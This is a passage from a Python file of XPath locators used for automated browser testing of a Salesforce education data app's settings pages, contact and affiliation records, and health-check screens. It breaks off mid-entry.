forceToastMessage')]/descendant::span[text()='{}']", "custom_toast": "//div[contains(@class, 'forceToastMessage')]/descendant::span[contains(@class, 'toastMessage')]", "settings_nav_title": "//div[@data-qa-locator='edaSettingsNavigation']/descendant::a[text()='{}']", "dropdown_input": "//label[text()='{}']/../descendant::button[contains(@class, 'slds-combobox__input')]", "settings_dropdown": "//label[text()='{}']/../descendant::span[text()='{}']", "select_from_list": "//div[text()='{}']/../following-sibling::div/descendant::div[contains(@class, 'list__options')]/descendant::span[text()='{}']", "move_to_selected": "//div[text()='{}']/../following-sibling::div/descendant::button[@type='button' and @title='Move selection to Selected Account Record Types']", "tell_me_more": "//div[text()='{}']/../descendant::a[text()='{}']", "toggle_status": "//span[text()='{}']/../ancestor::lightning-input", "toggle_input": "//span[text()='{}']/../descendant::span[contains(@id, 'toggle')]", "update_button": "//div[text()='{}']/../parent::div/descendant::button[text()='{}']", "footer_button": "//div[contains(@class, 'footer')]/descendant::button[@title='{}']", "app_tile": "//h2[text()='{}']/../descendant::ul/descendant::*[self::div or self::span][text()='{}']", "show_actions_button": "//tr[@data-row-key-value='{}']/descendant::span[text()='Show actions']/ancestor::button[@type='button']", "actions_menu": "//tr[@data-row-key-value='{}']/descendant::span[text()='{}']/ancestor::a[@role='menuitem']", }, "eda_settings_cc": { "default_cc_checkbox": "//div[text()='Enable Course Connections']/following-sibling::div/descendant::img", "dropdown_values": "//div[text()='{}']/following-sibling::div/select/option[text()='{}']", "dropdown_values_count": "//div[text()='{}']/following-sibling::div/select/option", "enable_cc_checkbox": "//div[text()='Enable Course Connections']/following-sibling::div[1]/descendant::span", "enable_cc_warning_enabled": "//div[contains(@class, 'slds-notify') and @role='alert']/descendant::*[@data-key='warning']/../../following-sibling::span[text()='You must enable Course Connections before editing record types.']", "enable_cc_warning_disabled": "//span[contains(@class, 'slds-hide')]/descendant::div[contains(@class, 'slds-notify') and @role='alert']/descendant::*[@data-key='warning']/../../following-sibling::span[text()='You must enable Course Connections before editing record types.']", "updated_dropdown_value": "//div[text()='{}']/following-sibling::div/descendant::span[text()='{}']", "settings_tab": "//div[contains(@class, 'CourseConnections')]/descendant::a[text()='Settings']", "backfill_warning_enabled": "//div[contains(@class, 'slds-notify--alert')]/descendant::span[text()='You must enable Course Connections before running the Course Connections Backfill.']", "backfill_warning_disabled": "//span[contains(@class, 'slds-hide')]/descendant::span[text()='You must enable Course Connections before running the Course Connections Backfill.']", "cc_sub_tabs": "//div[contains(@class, 'CourseConnections')]/descendant::a[text()='{}']", "backfill_button_status": "//span[text()='{}']/parent::button", "backfill_checkbox_status": "//input[contains(@class, 'backfill')]/following-sibling::span[contains(@class, 'checkbox')]", "backfill_checkbox": "//span[text()='I understand and am ready to run Backfill.']/../span[contains(@class, 'checkbox')]", "backfill_toast": "//div[@id='backFillToast']/descendant::span[text()='{}']", }, "eda_settings_program_plans": { "checkbox_read": "(//span[text()='{}']/../following-sibling::div/descendant::img)[1]", "checkbox_edit": "(//span[text()='{}']/../following-sibling::div/descendant::span)[1]", "updated_checkbox_edit": "//span[text()='{}']/../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", }, "eda_settings_affiliations": { "acc_rec_type_edit": "//span[text()='Acc Record Type: {}']/../following-sibling::input[contains(@class, 'mapping-acc-rec-type')]", "acc_rec_type_cleared": "//span[text()='Acc Record Type: ']/../following-sibling::input[contains(@class, 'mapping-acc-rec-type')]", }, "eda_settings_courses": { "text_message": "//span[text()='{}']", }, "eda_settings_accounts_contacts": { "checkbox": "//span[text()='{}']/following::div[1]/descendant::span[text()='{}']/parent::label/span[contains(@class, 'checkbox')]", "checkbox_value": "//span[text()='{}']/following::label[1][contains(@class, 'checkbox')]/span[contains(@class, 'checkbox')]", "checkbox_list": "//span[text()='{}']/../../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", "checkbox_list_read": "//span[text()='{}']/../../following-sibling::div[1]/descendant::img", "dropdown_acc": "//span[text()='{}']/../following-sibling::div[1]/select/option[text()='{}']", }, "eda_settings_relationships": { "dropdown_read": "//span[text()='{}']/../following-sibling::div[1]/descendant::span", "dropdown_value": "//span[text()='{}']/../following-sibling::div/descendant::select/option[text()='{}']", "new_reciprocal_setting": "//div[contains(@class, 'newrecsetting')]/descendant::span[text()='{}']/following::input[1]", "sub_tab": "//div[@id='relTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "active_checkbox": "//span[text()='{}']/following::input[contains(@class, 'new-rec-sett')]/../span[contains(@class, 'checkbox')]", "add_setting_button": "//div[contains(@class, 'newrecsetting')]/descendant::span[text()='{}']", "settings_count": "//span[contains(@class, 'Checkbox')]/img[contains(@class, 'rec-settg')]", "new_settings": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-{}]/span[contains(@class, 'rec-settg-{}') and text()='{}']", "new_setting_edit": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::input[contains(@class, 'rec-settg-{}')]/../label/span[text()='{}: {}']", "new_setting_checkbox": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-1]/descendant::img[contains(@class, 'rec-settg-{}')]", "new_setting_checkbox_edit": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-1]/descendant::input[contains(@class, 'rec-settg-{}')]/../span[contains(@class, 'checkbox')]", "delete_setting_icon": "//span[text()='{}: {}']/following::lightning-icon[1][contains(@class, 'delete')]", "removed_setting": "//span[contains(@class, 'rec-settg-{}') and text()='{}']", "removed_autoc_setting": "//span[contains(@class, 'autoc-settg-{}') and text()='{}']", "updtate_setting_name": "//span[text()='Name: {}']/../following-sibling::input[contains(@class, 'rec-settg-{}')]", "update_setting_name_cleared": "//span[text()='Name: ']/../following-sibling::input[contains(@class, 'rec-settg-name')]", "update_setting_rest": "(//span[text()='Name: {}']/following::input[contains(@class, 'rec-settg-{}')])[1]", "updated_setting": "//span[contains(@class, 'rec-settg-name') and text()='{}']/following::div/span[contains(@class, 'rec-settg-{}') and text()='{}']", "test_locator": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-2]/descendant::input[contains(@class, 'rec-settg-neutral')]", "new_autocreate_setting": "//div[contains(@class, 'newautocsetting')]/descendant::span[text()='{}']/following::input[1]", "campaign_type_textarea": "//div[contains(@class, 'newautocsetting')]/descendant::span[text()='{}']/following::textarea", "new_settings_autoc": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/span[contains(@class, 'autoc-settg-{}') and text()='{}']", "new_autoc_setting_edit": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::input[contains(@class, 'autoc-settg-{}')]/../label/span[text()='{}: {}']", "new_campaign_types_edit": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::textarea[contains(@class, 'autoc-settg-{}')]/../label/span[text()='{}: {}']", }, "eda_settings_system": { "default_checkbox": "//span[text()='{}']/../following-sibling::div[1]/descendant::img", "default_dropdown_value": "//span[text()='{}']/../following-sibling::div[1]/descendant::span[text()='{}']", "admin_success_toast": "//div[@id='adminSuccessToast']/descendant::h2", "hh_success_toast": "//div[@id='hhSuccessToast']/descendant::h2", "other_accname_format": "//span[text()='{}']/../preceding-sibling::div[1]/descendant::input", "other_dropdown_value": "//span[text()='{}']/../preceding-sibling::div[1]/descendant::span[text()='{}']", "recipient_type_value": "//span[text()='{}']/../following-sibling::div/descendant::select/option[@value='{}']", "recipient_name": "//label[text()='{}']/../div/descendant::input", "recipient_lookup": "//div[contains(@class, 'lookup') and text()='{}']", }, "account_types": { "administrative": "//span[contains(text(),'Administrative')]/parent::*", "household": "//span[text()='Household Account']/preceding-sibling::span", "account_checkbox": "//div[contains(@class,'slds-form-element__control')]//span[contains(text(),'{}')]", "save": "//button[contains(@class, 'slds-button')]/span[text()='Save']/..", "edit": "//button[contains(@class, 'slds-button')]/span[text()='Edit']/..", "cancel": "//button[contains(@class, 'slds-button')]/span[text()='Cancel']/..", }, "contact": { "new_button": "//a[@title='New']//div[@title='New']", "first_name": "//input[contains(@class,'firstName')]", "last_name": "//input[contains(@class,'lastName')]", "save_button": "//button[@title='Save']", "program_enrollment_new_button": "//div[contains(@class, 'windowViewMode-normal')]//span[text()='Program Enrollments']/following-sibling::span[@title='(0)']/ancestor::header/following-sibling::div/descendant::a[@title='New']", }, "program_plans": { "program_plan": "(//a[@title='Program Plans'])[2]/span/span", "new_button": "//a[@title='New']//div[@title='New']/..", "pp_name": "//div//div//div//div//div//div//div//label//span[contains(text(), 'Program Plan Name')]//../following-sibling::input", "save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", }, "plan_requirement": { "error": "//div[contains(@class, 'pageLevelErrors')]/descendant::li[text()='{}']", "parent_plan_req_name": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Parent Plan Requirement']/../following-sibling::div/descendant::span[text()='{}']", "plan_requirement_name": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Plan Requirement Name']/../following-sibling::input", "program_plan_name": "//td/a[@title='{}']", "program_plan": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Program Plan']/../following-sibling::div/descendant::span[text()='{}']", "delete_field": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='{}']/../following-sibling::div/descendant::span[text()='{}']/following-sibling::a[@class='deleteAction']", "toast_message": "//lightning-icon[contains(@class, 'toastIcon') and contains(@class, 'slds-icon-utility-success')]", }, "course_offering": { "search_courses": "//div/input[@title='Search Courses']", "new_button": "//a[@title='New']//div[@title='New']/..", "new_course_button": "//span[@class='itemLabel slds-truncate slds-show--inline-block slds-m-left--xx-small' and contains(text(), 'New Course')]", "save_button": "(//span[@class=' label bBody' and text()='Save']/ancestor::button[contains(@class, 'slds-button')])[3]", "next_save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", "final_save_button": "(//span[@class=' label bBody' and text()='Save'])[3]/ancestor::button", }, "settings_health_check": { "run_health_check_button": "//button[@title='{}']", "health_check_header": "//h2[contains(@class, 'header')]/span[text()='{}']", "last_run_date": "//button[@title='Run Health Check']/preceding::div[1]", "expand_button": "//button[@title='Expand these results' and contains(@aria-controls, '{}')]", "all_checks_status": "//div[text()='{}']/following-sibling::div/div[contains(@class, 'text')]", "status_value": "//div[contains(@id, '{}')]/descendant::td/descendant::lightning-base-formatted-text[text()='{}']/ancestor::td/preceding-sibling::th[@data-label='Status']/descendant::lightning-base-formatted-text", "recommended_fix_value": "//div[contains(@id, '{}')]/descendant::td/descendant::lightning-base-formatted-text[text()='{}']/ancestor::tr/descendant::td[@data-label='Recommended Fix']/descendant::lightning-base-formatted-text", }, "term": { "new_term_button": "//span[@class='itemLabel slds-truncate slds-show--inline-block slds-m-left--xx-small' and contains(text(), 'New Term')]//..", "save_button": "(//span[@class=' label bBody' and contains(text(), 'Save')])[5]/..", "account": "//div//input[@title='Search Accounts']", "search_terms": "//input[@title='Search Terms']", "course_offering_id": "//span[contains(text(), 'Course Offering ID')]//../following-sibling::input", }, "custom_settings": { "hierarchy_settings": "//a[text()='Hierarchy Settings']", "manage": "//span/input[@value='Manage']", "no_records": "//table//td[text()='No records to display.']", "custom_settings_frame": "//iframe[contains(@title,'Custom Settings ~ Salesforce')]", "custom_settings_definition": "//iframe[contains(@title,'Custom Setting Definition ~ Salesforce')]", "custom_settings_h_settings": "//iframe[contains(@title,'Custom Setting Hierarchy Settings ~ Salesforce')]", }, "new_account": "//span[@title='New Account']", "new_account_next_button": "//button[contains(@class, 'slds-button')]//span[@class=' label bBody' and text()='Next']", "new_account_name": "//label/span[text()='Account Name']/following-sibling::span/following::input[1]", "new_account_save_button": "//div[contains(@class, 'slds-modal__footer')]/descendant::button[@title='Save']", "account_record_type": "//span[contains(text(), '{}')]", "new_program_enrollment_save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", "affiliated_accounts_count": "//span[text()='Affiliated Accounts']/following-sibling::span[contains(@title, '(1)')]", "custom_settings_title": "//a/mark[text()='{}']", "program_enrollments_count": "//span[text()='Program Enrollments']/following-sibling::span[contains(@title, '(1)')]", "programenrollment_account": "//div[@class='autocompleteWrapper slds-grow']//input[@class=' default input uiInput uiInputTextForAutocomplete uiInput--default uiInput--input uiInput uiAutocomplete uiInput--default uiInput--lookup']", "list_of_departments": "//button[contains(@class, 'slds-button slds-button--neutral')]//span[@class=' label bBody' and text()='Next']", "tab": "//div[@class='uiTabBar']/ul[@class='tabs__nav']/li[contains(@class,'uiTabItem')]/a[@class='tabHeader']/span[contains(text(), '{}')]", "account_list": '//tbody/tr/th[.//span[contains(@class, "slds-grid")]]/descendant::a[text()="{}"]', "header_field_value": '//*[contains(@class, "slds-page-header__detail")][.//*[@title="{}"]]//*[text()="{}"]', "modal": { "checkbox": '//div[contains(@class,"uiInputCheckbox")]/label/span[text()="{}"]/../following-sibling::input[@type="checkbox"]', "save": "//div[contains(@class, 'footer') or contains(@class, 'Footer')]/descendant::button[@title='Save']", }, "accounts_contacts_settings_locators": { "copy_from": "//select[@class='contact-preferred-phone-picklist-input-select select uiInput uiInputSelect uiInput--default uiInput--select']", "disable_checked": "(//span[text()='Disable Preferred Phone enforcement']/following::div/div/div/label/input/following-sibling::span)[1]", "disable_preferred_phone": "//div/span[text()='Disable Preferred Phone enforcement']/following::div[1]/div/div/label/span/img[@alt='False']", "enhanced_preferred_clear": "//div/span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/span/img[@alt='False']", "enhanced_preferred_clear_faux": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/input/following::span[1]", "enhanced_preferred_set": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/span/img[@alt='True']", "enhanced_preferred_set_faux": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/input/following::span[1]", "preferred_phone_active": "//div/span[text()='Disable Preferred Phone enforcement']/following::div[1]/div/div/label/span/img[@alt='True']", }, "relationships_settings_locators": { "sub_tab": "//div[@id='relTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", }, "contacts_locators": { "contact_save": "//div[contains(@class,'modal-footer')]//button[@title='Save']//span[text()='Save']", "header": "//a[@title='Contacts']//span", "select_contact": "//a[@title='{} {}']", "preferred_phone": "//span//span[contains(text(),'Preferred Phone')]", "preferred_phone_home_dropdown": "//span//span[contains(text(),'Preferred Phone')]/following::span/following::a", "preferred_tab": "//div[@class='select-options']/descendant::a[@title='Home Phone']", "phone_verify_has_number": "(//div//span[text()='Phone']/../following-sibling::div//span[not( text()='123-123-1234')])[1]", "preferred_error_message": "//li[contains(text(), 'The phone selected for Preferred Phone can')]", "which_preferred_error_message": "//li[contains(text(), 'Tell us which Phone is preferred.')]", "field_for_work_phone": "//div//label//span[contains(text(),'Work Phone')]/../following-sibling::input", "which_footer_cancel": "//div[contains(@class,'footer')]/button[@title='Cancel']//span[text()='Cancel']", "footer_save": "//div[contains(@class,'modal-footer')]//span[text()='Save']", "accounts_contacts": "//a[contains(text(),'Accounts and Contacts')]", "details_tab": "//div[contains(@class,'normal')]//span[@class='title' and text()='Details']", "phone_home": "//span[text()='Home Phone']/../following-sibling::input", "run_cleanup": "//button[text()='Run Cleanup']", "phone_verify": "//div//span[text()='Home Phone']/../following-sibling::div//span//span[text()='123-123-1234']", "home_phone_verify": "//span[text()='Home Phone']/../following::div//span//span[text()='123-123-1234']", "successful_run": "//span[text()='The process was queued successfully. An email will be sent at the completion of the job.']", "apex_jobs": "//a/mark[text()='{}']", "primary_business_organization": "(//span[text()='Primary Business Organization']/following::div/div/div/div/input[@title='Search Accounts'])[1]", "button_save_affiliation": "//button[@title='Save']//span[text()='Save']", "delete_icon": "//span[@class='deleteIcon']", }, "affiliations_locators": { "header": "//a[@title='EDA Settings']//span", "tab": "//div[@id='tabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "edit": "//button[contains(@class, 'slds-button') and @type='button']/span[text()='Edit']/..", "checkbox": "//span[text()='{}']/../following-sibling::div/descendant::label[contains(@class,'slds-checkbox')]/span[contains(@class, 'slds-checkbox--faux')]", "save": "//div[contains(@class, 'slds-page-header')]/descendant::button[contains(@class, 'settings-save-bttn')]", "sub_tab": "//div[@id='afflTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "edit_button": "//div[@class='slds-button-group']//span[contains(text(), 'Edit')]", "save_button": "//div[@class='slds-button-group']//span[contains(text(), 'Save')]", "un_ert_validation": "//span/img[@class='affl-record-type-enforced unchecked' and @alt='False']", "un_delete_rec_affl": "//span/img[@class='delete-prog-enroll unchecked' and @alt='False']", "specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "copy_affl_end_date": "//span/img[@class='copy-end-date checked' and @alt='True']", "copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "affiliations_former": "//div/div/following::div/span[text()='Former']", "affiliations_student": "(//div/div/span[@class='uiOutputText' and text()='Role Specified for Created Affiliations']/following::div[@class='slds-col slds-size--1-of-2'])[1]/span[text()='Student']", "affiliations_current": "//div/div/following::div[@class='slds-col slds-size--1-of-2']/span[text()='Current']", "account_record_type_academic_program": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Academic Program']", "contact_primary_affl_field_primary_academic_program": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Academic Program']", "auto_enroll_academic_program": "//div/span[text()='Primary Academic Program']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enrollment_edit_mode_status_academic_program": "(//span[text()='Primary Affl Field: Primary Academic Program']/../../../following-sibling::div/following-sibling::div/div/label/span[text()='Status: Current']/following::input)[1]", "ae_em_status_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "auto_enrollment_edit_mode_role_academic_program": "(//span[text()='Primary Affl Field: Primary Academic Program']/../../../following-sibling::div/following-sibling::div/div/label/span[text()='Role: Student']/following::input)[1]", "ae_em_role_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "auto_enrollment_read_mode_status_academic_program": "(//div/span[text()='Primary Academic Program']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='Current']", "auto_enrollment_read_mode_role_academic_program": "(//div/span[text()='Primary Academic Program']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='Student']", "account_record_type_business_organization": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Business Organization']", "contact_primary_affl_field_primary_business_organization": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Business Organization']", "auto_enroll_business_organization": "//div/span[text()='Primary Business Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "ae_em_bo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "auto_enrollment_edit_mode_role_business_organization": "(//span[text()='Primary Affl Field: Primary Business Organization']/../../../following-sibling::div/following-sibling::div/following-sibling::div//span[text()='Role: ']/following::input)[1]", "ae_em_pbo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "auto_enrollment_read_mode_status_business_organization": "(//div/span[text()='Primary Business Organization']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "ae_enroll_bo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "auto_enrollment_read_mode_role_business_organization": "(//div/span[text()='Primary Business Organization']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ae_enroll_bo_status_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_educational_institution": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Educational Institution']", "contact_primary_affl_field_primary_educational_institution": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Educational Institution']", "auto_enroll_educational_institution": "//div/span[text()='Primary Educational Institution']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_educational_institution": "(//div/span[text()='Primary Educational Institution']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_educational_institution": "(//div/span[text()='Primary Educational Institution']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ei_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ei_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ei_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ed_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_household_account": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Household Account']", "contact_primary_affl_field_primary_household": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Household']", "auto_enroll_household_account": "//div/span[text()='Primary Household']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_household_account": "(//div/span[text()='Primary Household']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_household_account": "(//div/span[text()='Primary Household']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ha_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ha_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ha_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ha_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_sports_organization": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Sports Organization']", "contact_primary_affl_field_primary_sports_organization": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Sports Organization']", "auto_enroll_sports_organization": "//div/span[text()='Primary Sports Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_sports_organization": "(//div/span[text()='Primary Sports Organization']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_sports_organization": "(//div/span[text()='Primary Sports Organization']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "so_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "pso_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "so_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "so_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_university_department": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='University Department']", "contact_primary_affl_field_primary_department": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Department']", "auto_enroll_university_department": "//div/span[text()='Primary Department']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_university_department": "(//div/span[text()='Primary Department']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_university_department": "(//div/span[text()='Primary Department']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ud_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ud_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ud_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ud_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_input": "//label/span[text()='Account Record Type']/../following-sibling::input", "primary_affl_field_input": "//label/span[text()='Primary Affl Field']/../following-sibling::input", "auto_enrollment": "(//label/span[text()='Auto-Enrollment']/following::br/following::div/label/input/following-sibling::span)[1][@class='slds-checkbox--faux']", "status_mapping_field_input": "//label/span[text()='Status']/../following-sibling::input", "role_mapping_field_input": "//label/span[text()='Role']/../following-sibling::input", "acc_record_type": "//label/span[text()='Acc Record Type: {}']/following::input[1][@class='mapping-acc-rec-type input' and @type='text']", "contact_primary_affl_field": "//label/span[text()='Primary Affl Field: 